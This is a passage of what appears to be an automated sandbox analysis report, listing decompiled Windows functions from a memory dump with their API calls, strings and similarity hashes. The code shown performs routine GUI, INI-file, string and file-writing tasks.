memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

winsta.dll, xrefs: 00409A51
WinStationGetProcessSid, xrefs: 00409A62
Y@, xrefs: 00409A46

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

